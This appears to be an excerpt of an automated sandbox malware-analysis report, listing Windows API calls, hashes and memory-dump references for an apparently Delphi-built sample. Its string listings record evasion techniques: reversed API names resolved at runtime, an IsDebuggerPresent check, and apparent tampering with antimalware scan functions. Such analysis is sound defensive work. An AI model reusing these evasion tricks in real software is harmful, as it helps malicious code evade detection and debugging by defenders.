                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4AEEB
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 02C4AEF7
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02C4AF0B
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Read$HandleModule
                                                                                                                                      • String ID: KernelBase$LoadLibraryExA
                                                                                                                                      • API String ID: 2226866862-113032527
                                                                                                                                      APIs
                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?,02C907C8,?,?,02C5D7A8,02C3655D,02C5C30D), ref: 02C34365
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?,02C907C8,?,?,02C5D7A8,02C3655D,02C5C30D), ref: 02C3436B
                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,02C343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?,02C907C8), ref: 02C34380
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F5,02C343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?), ref: 02C34386
                                                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C343A4
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHandleWrite$Message
                                                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                                                      • API String ID: 1570097196-2970929446
                                                                                                                                      • Opcode ID: 1659e76959190e42adde33f3cd0b3ba92d1046a6daf71c672ba42163ab5080ec
                                                                                                                                      • Instruction ID: 4435c255b176517c73a162365a1be197334918b929a7cab39282f228dc3dfcde
                                                                                                                                      • Opcode Fuzzy Hash: 1659e76959190e42adde33f3cd0b3ba92d1046a6daf71c672ba42163ab5080ec
                                                                                                                                      • Instruction Fuzzy Hash: 43F02B61AC03007DFA26B2606C45FA9335C0780F14F184F14F629A50C5C7E0D0C4EB17
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C3ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C3ACE1
                                                                                                                                        • Part of subcall function 02C3ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C3AD05
                                                                                                                                        • Part of subcall function 02C3ACC4: GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C3AD20
                                                                                                                                        • Part of subcall function 02C3ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C3ADB6
                                                                                                                                      • CharToOemA.USER32(?,?), ref: 02C3AE83
                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEA0
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEA6
                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,02C3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEBB
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F4,02C3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C3AEC1
                                                                                                                                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C3AEE3
                                                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C3AEF9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 185507032-0
                                                                                                                                      • Opcode ID: 3cdb1e1079d2ed09eac8617d343a43c52f93f862fe091cbcaa29c48f8dff96f0
                                                                                                                                      • Instruction ID: d4233352ff44175dedb5bd16903c4da48ec38e41c75bf9db6e1bd15e338aeb36
                                                                                                                                      • Opcode Fuzzy Hash: 3cdb1e1079d2ed09eac8617d343a43c52f93f862fe091cbcaa29c48f8dff96f0
                                                                                                                                      • Instruction Fuzzy Hash: 55117CB25942047AD202FBA4DC80F8B77EDAB49700F904E26B394D60D0DA71E954DF6A
                                                                                                                                      APIs
                                                                                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C3E5AD
                                                                                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C3E5C9
                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C3E602
                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C3E67F
                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C3E698
                                                                                                                                      • VariantCopy.OLEAUT32(?,00000000), ref: 02C3E6CD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 351091851-0
                                                                                                                                      • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                      • Instruction ID: 250173e70cce09fbf4083c1c8e621d2ccd232b5519ad99fd82c00229bccdb71a
                                                                                                                                      • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                      • Instruction Fuzzy Hash: 4351E776A0062D9BCB22EF58CC80BD9B3BDAF4C310F4049D5E509E7241D670AF859FA1
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C3358A
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335BD
                                                                                                                                      • RegCloseKey.ADVAPI32(?,02C335E0,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335D3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                      • API String ID: 3677997916-4173385793
                                                                                                                                      • Opcode ID: 82aca388bdd25c4647ebb4637bf456c56e225a0ac34865451210c4814984c531
                                                                                                                                      • Instruction ID: 0b342434a2abcecbe3b30433dc28f2d38b5a0328a8e2e7c0039e7d5b4f201a40
                                                                                                                                      • Opcode Fuzzy Hash: 82aca388bdd25c4647ebb4637bf456c56e225a0ac34865451210c4814984c531
                                                                                                                                      • Instruction Fuzzy Hash: 7F01B576944358BEE712DB90CD02BBD77FCEB48710F1009A1BA05E7580E675D610DA98
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                                                                                      • API String ID: 667068680-1372893251
                                                                                                                                      • Opcode ID: 0d788140306a305a8f6195daea772693f924d3d18cebf764bdea04ea2c4e92dc
                                                                                                                                      • Instruction ID: 48587fefb4ef0737ac743a98c3d6bd115b9af2fd2ca8a7f8289052ce4c0710ca
                                                                                                                                      • Opcode Fuzzy Hash: 0d788140306a305a8f6195daea772693f924d3d18cebf764bdea04ea2c4e92dc
                                                                                                                                      • Instruction Fuzzy Hash: 5B018B78A40304AFEB12EFA4DC42A9E77BEEB49720F514C65B40897A40DA70A900EA24
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C3AA6F,?,?,00000000), ref: 02C3A9F0
                                                                                                                                        • Part of subcall function 02C3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C3AA6F,?,?,00000000), ref: 02C3AA20
                                                                                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02C3AA2B
                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C3AA6F,?,?,00000000), ref: 02C3AA49
                                                                                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02C3AA54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4102113445-0
                                                                                                                                      • Opcode ID: 7320ec197e3b211b531ed187c96daaabb1f3f4f65e11bef9d9d8b58cbe809ecb
                                                                                                                                      • Instruction ID: 71ae910bc3fee8c3422a483577526f9701e89786a730d3c77d49c9bc7b53af51
                                                                                                                                      • Opcode Fuzzy Hash: 7320ec197e3b211b531ed187c96daaabb1f3f4f65e11bef9d9d8b58cbe809ecb
                                                                                                                                      • Instruction Fuzzy Hash: 7C0126726806487FF703E7B48D12B6E736DDB42720FA14D70F641E66D0D6349E109EA8
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C33538: GetKeyboardType.USER32(00000000), ref: 02C3353D
                                                                                                                                        • Part of subcall function 02C33538: GetKeyboardType.USER32(00000001), ref: 02C33549
                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 02C5C06C
                                                                                                                                      • GetACP.KERNEL32 ref: 02C5C080
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C5C08A
                                                                                                                                        • Part of subcall function 02C33568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C3358A
                                                                                                                                        • Part of subcall function 02C33568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335BD
  • Part of subcall function 02C33568: RegCloseKey.ADVAPI32(?,02C335E0,00000000,?,00000004,00000000,02C335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C335D3
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
• String ID: p6X
• API String ID: 3316616684-1193081329
• Opcode ID: 9eb1ccbdb4d2412e0e109ee0a51fbe25bc01af1e3143d23d1712b820b1e3a122
• Instruction ID: 7d041d0a59ec8c4d5398dbd046002f27c16a96c8545397e788b3fcd5c08132dd
• Opcode Fuzzy Hash: 9eb1ccbdb4d2412e0e109ee0a51fbe25bc01af1e3143d23d1712b820b1e3a122
• Instruction Fuzzy Hash: 830140A08453C19DD703ABB4A9442593FA1AF033147088EC9D8844F252D7644159EFE6
APIs
• GetThreadLocale.KERNEL32(?,00000000,02C3AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C3AAB7
  • Part of subcall function 02C3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
• Opcode ID: 9c21b2bab52f79e8e0187b97da352eaf06b5bc594005e111e46be5afcd28109f
• Instruction ID: 4dac28bdc36a2644a955f884d8219530221eb5369bede26d3bb543431d3decd9
• Opcode Fuzzy Hash: 9c21b2bab52f79e8e0187b97da352eaf06b5bc594005e111e46be5afcd28109f
• Instruction Fuzzy Hash: 814116717049054BC72BAB6A98903BEB3EBEB86304B104E65D4E2C7344D739DE25DE21
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
  • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
• GetModuleHandleA.KERNELBASE(?), ref: 02C48072
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
• Opcode ID: 940a0b72a6fe25de4b7d80aeaf4828df07af5f2c7ddf5a509348e9898876dc6d
• Instruction ID: a436c2aa72a5bb063f7112b783f18415bde15388d2dc6a01d48c1ca3cae94254
• Opcode Fuzzy Hash: 940a0b72a6fe25de4b7d80aeaf4828df07af5f2c7ddf5a509348e9898876dc6d
• Instruction Fuzzy Hash: E2F06D71650304AFEB15EFA4DC06A5F77ADFB49B50B914A60F40893A10DA70BD10AAA4
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,02C4EF98,UacInitialize,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,Initialize), ref: 02C4EB9A
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C4EBAC
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
• Opcode ID: d6b9900660773215b13b0fa0724b1bd7e2204fc5617339e4e8b0f9b0237f6eb9
• Instruction ID: 50c53b5d14de6b3eca0a0b74be4783f6b93ebddd65a665859ae07e810eee1991
• Opcode Fuzzy Hash: d6b9900660773215b13b0fa0724b1bd7e2204fc5617339e4e8b0f9b0237f6eb9
• Instruction Fuzzy Hash: 56D08CA2755B102EFA0236F40CC4C1F02CDA94557E3311FB1F023D20E2EEBAC912251C
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,02C5C10B,00000000,02C5C11E), ref: 02C3C402
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C3C413
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 71116016c06f0e7badf08e4a1a20d8afb59c0ab4cd23d123224b005e17396179
• Instruction ID: 030d351b909bcbc0cb7d0b4fdb7bd25a03656fb0cced5449c9294a99844b7861
• Opcode Fuzzy Hash: 71116016c06f0e7badf08e4a1a20d8afb59c0ab4cd23d123224b005e17396179
• Instruction Fuzzy Hash: 63D09EA0A413115EE7035AB5688073A26DC9B48765B506D36A053B5102D779C6645FD8
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C3E21F
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C3E23B
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C3E2B2
• VariantClear.OLEAUT32(?), ref: 02C3E2DB
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
• Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction ID: 3b7898a9d6c98dedc408e9b152c3273dfae60fde3442c76c9b45bdd15c62694a
• Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction Fuzzy Hash: BA4108B5A0061D9BCB62DB59CC90BD9B3BDBF4C314F0049E5E649E7252DA31AF809F50
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C3ACE1
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C3AD05
• GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C3AD20
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C3ADB6
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: d78f758516fbd19d17f8f49bfe8369bb35f620fbbeae9d43cb435327322ddb27
• Instruction ID: 10ca8a6e76e1b62eae4df42b733eda2713567c07f34fd1b69f78c42a73ead1f2
• Opcode Fuzzy Hash: d78f758516fbd19d17f8f49bfe8369bb35f620fbbeae9d43cb435327322ddb27
• Instruction Fuzzy Hash: 3A416F71A40258AFDB22DB68CC84BDEB7FDAB18301F0048E5A648E7241DB759F98DF50
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C3ACE1
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C3AD05
• GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C3AD20
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C3ADB6
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
                                                                                                                                      • API String ID: 3990497365-0
                                                                                                                                      • Opcode ID: 987317bddc7cf7c690bda678ad7df33dca04c3acc1fe0371c5b275feb5f82f62
                                                                                                                                      • Instruction ID: 04cb20c451815ba27a90deb096f42b84afc9e51815b8e77c113a34513148b973
                                                                                                                                      • Opcode Fuzzy Hash: 987317bddc7cf7c690bda678ad7df33dca04c3acc1fe0371c5b275feb5f82f62
                                                                                                                                      • Instruction Fuzzy Hash: 92416F71A40258AFDB22DB68CC84BDAB7FDAB18301F0048E5A648E7341DB759F98DF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
